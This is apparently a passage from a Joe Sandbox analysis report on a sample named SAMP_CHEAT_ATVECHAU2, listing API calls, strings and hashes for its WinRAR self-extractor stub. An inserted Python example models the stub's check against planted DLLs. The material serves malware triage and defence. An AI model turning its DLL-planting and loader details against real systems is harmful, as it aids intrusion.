                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                    • API String ID: 3445078344-2608530638
                                                    • Opcode ID: f223bb3c377e4e66ce50d8d7733035cfdc4e78487e75b979c42481519629e952
                                                    • Instruction ID: ae93bf908d29dac2731fa45822620d8cfb0e4d5c8bac3cb7be630dc8fdda59a1
                                                    • Opcode Fuzzy Hash: f223bb3c377e4e66ce50d8d7733035cfdc4e78487e75b979c42481519629e952
                                                    • Instruction Fuzzy Hash: 28420570D44348BEEB219BB49C4AFBE7B6CAB11710F044155F648E62E2CB759A44DB32

                                                    Control-flow Graph
                                                    (rendered interactively in the original report; entry block d00863, basic blocks coloured executed / not executed; the per-block API calls are the ones listed under APIs below)
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 00D0087C
                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D0088E
                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D008BF
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D00B69
                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D00B83
                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D00B93
                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,00D23C7C,00000000), ref: 00D00BB1
                                                    • CloseHandle.KERNEL32(00000000), ref: 00D00C09
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D00C1E
                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00D23C7C,?,00000000,?,00000800), ref: 00D00C72
                                                    • GetFileAttributesW.KERNELBASE(?,?,00D23C7C,00000800,?,00000000,?,00000800), ref: 00D00C9C
                                                    • GetFileAttributesW.KERNEL32(?,?,00D23D44,00000800), ref: 00D00CD8
                                                      • Part of subcall function 00D0081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D00836
                                                      • Part of subcall function 00D0081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CFF2D8,Crypt32.dll,00000000,00CFF35C,?,?,00CFF33E,?,?,?), ref: 00D00858
                                                    • _swprintf.LIBCMT ref: 00D00D4A
                                                    • _swprintf.LIBCMT ref: 00D00D96
                                                      • Part of subcall function 00CF4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CF40A5
                                                    • AllocConsole.KERNEL32 ref: 00D00D9E
                                                    • GetCurrentProcessId.KERNEL32 ref: 00D00DA8
                                                    • AttachConsole.KERNEL32(00000000), ref: 00D00DAF
                                                    • _wcslen.LIBCMT ref: 00D00DC4
                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00D00DD5
                                                    • WriteConsoleW.KERNEL32(00000000), ref: 00D00DDC
                                                    • Sleep.KERNEL32(00002710), ref: 00D00DE7
                                                    • FreeConsole.KERNEL32 ref: 00D00DED
                                                    • ExitProcess.KERNEL32 ref: 00D00DF5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                    • API String ID: 1207345701-3298887752
                                                    • Opcode ID: 39216eb9ed60d94d4dac96903a122c640b16e49e28e057db2cc6e338e6ae40bc
                                                    • Instruction ID: c429eb8f819052acc8ff12c6ad75f50ecbe747785d2e35f96efea2cf9ce2a720
                                                    • Opcode Fuzzy Hash: 39216eb9ed60d94d4dac96903a122c640b16e49e28e057db2cc6e338e6ae40bc
                                                    • Instruction Fuzzy Hash: 25D1A5B1108394AFD3319F50E948B9FBAE8FFA5708F40491DF68996390C7788649CB76
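The function above is the SFX stub's DLL-planting guard: it resolves SetDllDirectoryW and SetDefaultDllDirectories through GetProcAddress (so the binary still loads on older Windows builds where the latter export is absent), takes its own path from GetModuleFileNameW, probes the application directory with GetFileAttributesW for the DLL names in the string list (DXGIDebug.dll, uxtheme.dll, dwmapi.dll), and on a hit writes the "Please remove %s from %s folder..." text to a console and calls ExitProcess. The Python below is an added example, not code from the sample or from WinRAR, that models that check generically for any executable and any list of guarded names; the exact probe order in the real function is not recoverable from the API list, so the model simply reports every guarded name found. The directory contents, file names and `demo()` helper are constructed here for illustration.

```python
"""
Added example: model of the planted-DLL self-check shown in the API trace
(GetModuleFileNameW -> GetFileAttributesW per candidate -> message + ExitProcess).
Not the sample's code; all paths and files below are constructed for the demo.
"""
import tempfile
from pathlib import Path

# Names taken from the string list of the function above. Any DLL that the
# loader would resolve from the application directory before System32 is a
# planting candidate; the guarded list is a parameter so the check generalises.
SFX_GUARDED_DLLS = ("DXGIDebug.dll", "uxtheme.dll", "dwmapi.dll")


def find_planted_dlls(exe_path, guarded=SFX_GUARDED_DLLS):
    """Return the guarded DLL names present beside exe_path.

    The comparison is case-insensitive because NTFS name lookup (and therefore
    the loader's search) is; an empty list means the stub would continue.
    """
    app_dir = Path(exe_path).resolve().parent
    present = {p.name.lower() for p in app_dir.iterdir() if p.is_file()}
    return [name for name in guarded if name.lower() in present]


def sfx_guard_message(exe_path, planted_name):
    """Format the refusal text the trace shows being written to the console."""
    exe = Path(exe_path).name
    folder = str(Path(exe_path).resolve().parent)
    return (f"Please remove {planted_name} from {folder} folder. "
            f"It is unsecure to run {exe} until it is done.")


def should_refuse_to_run(exe_path, guarded=SFX_GUARDED_DLLS):
    """True when the stub would print the message and ExitProcess."""
    return bool(find_planted_dlls(exe_path, guarded))


def demo():
    """Constructed scenario: an SFX stand-in with UXTHEME.DLL planted beside it.

    The odd casing is deliberate, to show the check is case-insensitive.
    Returns the list of planted names detected.
    """
    with tempfile.TemporaryDirectory() as d:
        exe = Path(d) / "setup.exe"
        exe.write_bytes(b"MZ")                          # constructed stand-in stub
        (Path(d) / "UXTHEME.DLL").write_bytes(b"MZ")    # constructed planted DLL
        (Path(d) / "readme.txt").write_bytes(b"hello")  # unrelated file, ignored
        found = find_planted_dlls(exe)
        if found:
            print(sfx_guard_message(exe, found[0]))
        return found


if __name__ == "__main__":
    print(demo())
```

When triaging an SFX-wrapped sample, the presence of this guard (and of the `winrarsfxmappingfile.tmp` / `__tmp_rar_sfx_access_check_%u` strings in the neighbouring function) identifies the outer layer as a stock WinRAR SFX stub; the behaviour of interest is in the appended archive and its setup command, not in this code.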

                                                    Control-flow Graph
                                                    (rendered interactively in the original report; entry block d0c73f, basic blocks coloured executed / not executed; the per-block API calls are the ones listed under APIs below)
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00D0C744
                                                      • Part of subcall function 00D0B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00D0B3FB
                                                    • _wcslen.LIBCMT ref: 00D0CA0A
                                                    • _wcslen.LIBCMT ref: 00D0CA13
                                                    • SetWindowTextW.USER32(?,?), ref: 00D0CA71
                                                    • _wcslen.LIBCMT ref: 00D0CAB3
                                                    • _wcsrchr.LIBVCRUNTIME ref: 00D0CBFB
                                                    • GetDlgItem.USER32(?,00000066), ref: 00D0CC36
                                                    • SetWindowTextW.USER32(00000000,?), ref: 00D0CC46
                                                    • SendMessageW.USER32(00000000,00000143,00000000,00D3A472), ref: 00D0CC54
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00D0CC7F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                    • API String ID: 2804936435-312220925
                                                    • Opcode ID: a1d09c94227c4ee95b081d17f5c3e197b80d9154e57a927a44aa5230d4716d59
                                                    • Instruction ID: 237343bbea9f14577c0a5e4d5c083851c25c8d31cb0a2dd393826df71931911e
                                                    • Opcode Fuzzy Hash: a1d09c94227c4ee95b081d17f5c3e197b80d9154e57a927a44aa5230d4716d59
                                                    • Instruction Fuzzy Hash: 25E143B2900219AADB24DBA4EC85FEE73BCDB05350F5441A6F649E3190EF749A848F71
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CFDA70
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CFDAAC
                                                      • Part of subcall function 00CFC29A: _wcslen.LIBCMT ref: 00CFC2A2
                                                      • Part of subcall function 00D005DA: _wcslen.LIBCMT ref: 00D005E0
                                                      • Part of subcall function 00D01B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CFBAE9,00000000,?,?,?,000103DE), ref: 00D01BA0
                                                    • _wcslen.LIBCMT ref: 00CFDDE9
                                                    • __fprintf_l.LIBCMT ref: 00CFDF1C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                    • API String ID: 566448164-801612888
                                                    • Opcode ID: 653ac419eb055fbf2c1d7da86bdac57dd0acb3aea3a64cf8252b537137013c6e
                                                    • Instruction ID: 64e1b22ce9095ee85beaac90b65c49b0c1e9811642e0c2e827301edb77949056
                                                    • Opcode Fuzzy Hash: 653ac419eb055fbf2c1d7da86bdac57dd0acb3aea3a64cf8252b537137013c6e
                                                    • Instruction Fuzzy Hash: 9732E07190021CABCF64EF68D841BFE77A5FF15300F40416AFA1697291EBB1DA85CB62

                                                    APIs
                                                      • Part of subcall function 00D0B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D0B579
                                                      • Part of subcall function 00D0B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D0B58A
                                                      • Part of subcall function 00D0B568: IsDialogMessageW.USER32(000103DE,?), ref: 00D0B59E
                                                      • Part of subcall function 00D0B568: TranslateMessage.USER32(?), ref: 00D0B5AC
                                                      • Part of subcall function 00D0B568: DispatchMessageW.USER32(?), ref: 00D0B5B6
                                                    • GetDlgItem.USER32(00000068,00D4FCB8), ref: 00D0D4E8
                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00D0AF07,00000001,?,?,00D0B7B9,00D2506C,00D4FCB8,00D4FCB8,00001000,00000000,00000000), ref: 00D0D510
                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D0D51B
                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00D235F4), ref: 00D0D529
                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D0D53F
                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00D0D559
                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D0D59D
                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00D0D5AB
                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D0D5BA
                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D0D5E1
                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00D243F4), ref: 00D0D5F0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                    • String ID: \
                                                    • API String ID: 3569833718-2967466578
                                                    • Opcode ID: cde0ec396515a0ebb154b15d9db5cc0b3a6b886df0a691c315bea5c2a9b2b0b1
                                                    • Instruction ID: 977103869d91d22a85d017c5ad9f2e167ab769bd4fd60832688dee90788c471a
                                                    • Opcode Fuzzy Hash: cde0ec396515a0ebb154b15d9db5cc0b3a6b886df0a691c315bea5c2a9b2b0b1
                                                    • Instruction Fuzzy Hash: 0C31E271145742BFE301DF24EC4AFAB7FACEB86769F000509F951D62D0EB648A088776

                                                    Control-flow Graph

                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00D0D7AE
                                                    • ShellExecuteExW.SHELL32(?), ref: 00D0D8DE
                                                    • ShowWindow.USER32(?,00000000), ref: 00D0D91D
                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00D0D959
                                                    • CloseHandle.KERNEL32(?), ref: 00D0D97F
                                                    • ShowWindow.USER32(?,00000001), ref: 00D0D9E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                    • String ID: .exe$.inf
                                                    • API String ID: 36480843-3750412487
                                                    • Opcode ID: 2cdff9399828761895000811f3333fc0bf73623e68580b0f3dbd64e9ca1e9bb1
                                                    • Instruction ID: 20ed5849222a23df68474eeef0b9754934016c5da02d4938bf14787754c8042d
                                                    • Opcode Fuzzy Hash: 2cdff9399828761895000811f3333fc0bf73623e68580b0f3dbd64e9ca1e9bb1
                                                    • Instruction Fuzzy Hash: D551B2755043809ADB319FA4A844BABBBE6EF42744F08441FF9C9D72E1D7718A84CB72

                                                    Control-flow Graph

                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D15695,00D15695,?,?,?,00D1ABAC,00000001,00000001,2DE85006), ref: 00D1A9B5
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D1ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00D1AA3B
                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D1AB35
                                                    • __freea.LIBCMT ref: 00D1AB42
                                                      • Part of subcall function 00D18E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D1CA2C,00000000,?,00D16CBE,?,00000008,?,00D191E0,?,?,?), ref: 00D18E38
                                                    • __freea.LIBCMT ref: 00D1AB4B
                                                    • __freea.LIBCMT ref: 00D1AB70
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1414292761-0
                                                    • Opcode ID: f56aa9b3934d3b9176b4ce02f22ae5c376632b8e68d82c4e76a66063e81dd381
                                                    • Instruction ID: 03553e0234644dc9a5fb9b0b73a36c259544bd6c569df73b50c01f307020d388
                                                    • Opcode Fuzzy Hash: f56aa9b3934d3b9176b4ce02f22ae5c376632b8e68d82c4e76a66063e81dd381
                                                    • Instruction Fuzzy Hash: DE51C072602256BBDB258E68ED41EFBB7AAEF40710F194629FC05D6141EF34DC80C6B1

                                                    Control-flow Graph

                                                    APIs
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00D13C35,?,?,00D52088,00000000,?,00D13D60,00000004,InitializeCriticalSectionEx,00D26394,InitializeCriticalSectionEx,00000000), ref: 00D13C03
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID: api-ms-
                                                    • API String ID: 3664257935-2084034818
                                                    • Opcode ID: 9947e51fe337423862a4802c07b06567076a044b804ff0517fbccfa989e2b09e
                                                    • Instruction ID: 6053f6efdad7e03b52e7305f75a53642be4813bff4ee069b9894860836eb0880
                                                    • Opcode Fuzzy Hash: 9947e51fe337423862a4802c07b06567076a044b804ff0517fbccfa989e2b09e
                                                    • Instruction Fuzzy Hash: 5E11A735A49321BBDB318B58ED41BD937649F11770F190120E955EB290FB70EF8086F5

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00CF7760,?,00000005,?,00000011), ref: 00CF995F
                                                    • GetLastError.KERNEL32(?,?,00CF7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CF996C
                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00CF7760,?,00000005,?), ref: 00CF99A2
                                                    • GetLastError.KERNEL32(?,?,00CF7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CF99AA
                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00CF7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CF99F9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: File$CreateErrorLast$Time
                                                    • String ID:
                                                    • API String ID: 1999340476-0
                                                    • Opcode ID: 595bbafc1ab4cfcb4f8d4f1e4defdbbd408cc99059adc9e6854e744e61bb8368
                                                    • Instruction ID: f58d18bcaa8a5f9626fcc30db33e021ae21ba932b935471cf01ae9865cf2be32
                                                    • Opcode Fuzzy Hash: 595bbafc1ab4cfcb4f8d4f1e4defdbbd408cc99059adc9e6854e744e61bb8368
                                                    • Instruction Fuzzy Hash: 1231F2305443496BEB309F24CD45BAABB94FB05320F100B19F6B9961D0D3F59B45CBA2

                                                    Control-flow Graph

                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D0B579
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D0B58A
                                                    • IsDialogMessageW.USER32(000103DE,?), ref: 00D0B59E
                                                    • TranslateMessage.USER32(?), ref: 00D0B5AC
                                                    • DispatchMessageW.USER32(?), ref: 00D0B5B6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                    • String ID:
                                                    • API String ID: 1266772231-0
                                                    • Opcode ID: 5672498c453d83641c0682936ddd184bf2a75f124138ff263dbfe81e0af3aa00
                                                    • Instruction ID: a7c4d09a0859db5336c28191b1e3cd2c858bc65dbd920a0465b2ed6a4471b7fc
                                                    • Opcode Fuzzy Hash: 5672498c453d83641c0682936ddd184bf2a75f124138ff263dbfe81e0af3aa00
                                                    • Instruction Fuzzy Hash: 55F0D071A0131AABCB209FE5DC4CEDB7FBCEE053A17044415B919D2190EB34D605CBB0

                                                    Control-flow Graph

                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000050), ref: 00D0ABC2
                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 00D0ABF9
                                                      • Part of subcall function 00D01FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CFC116,00000000,.exe,?,?,00000800,?,?,?,00D08E3C), ref: 00D01FD1
                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00D0ABE9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                    • String ID: EDIT
                                                    • API String ID: 4243998846-3080729518
                                                    • Opcode ID: dba1cbcaaa0a5a6625b9a2b518ddf8af2138196a1c70f31ec4990c6b846c1a5b
                                                    • Instruction ID: d1889c9e09d3654a9f10aa59db6b4440f86b17ff7fe543eb12aa7bab80ca1060
                                                    • Opcode Fuzzy Hash: dba1cbcaaa0a5a6625b9a2b518ddf8af2138196a1c70f31ec4990c6b846c1a5b
                                                    • Instruction Fuzzy Hash: 92F0823260032976DB205A299C09FDB776C9F46B91F484011BE09E32C0D760DA4186B6

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00D0081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D00836
                                                      • Part of subcall function 00D0081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CFF2D8,Crypt32.dll,00000000,00CFF35C,?,?,00CFF33E,?,?,?), ref: 00D00858
                                                    • OleInitialize.OLE32(00000000), ref: 00D0AC2F
                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D0AC66
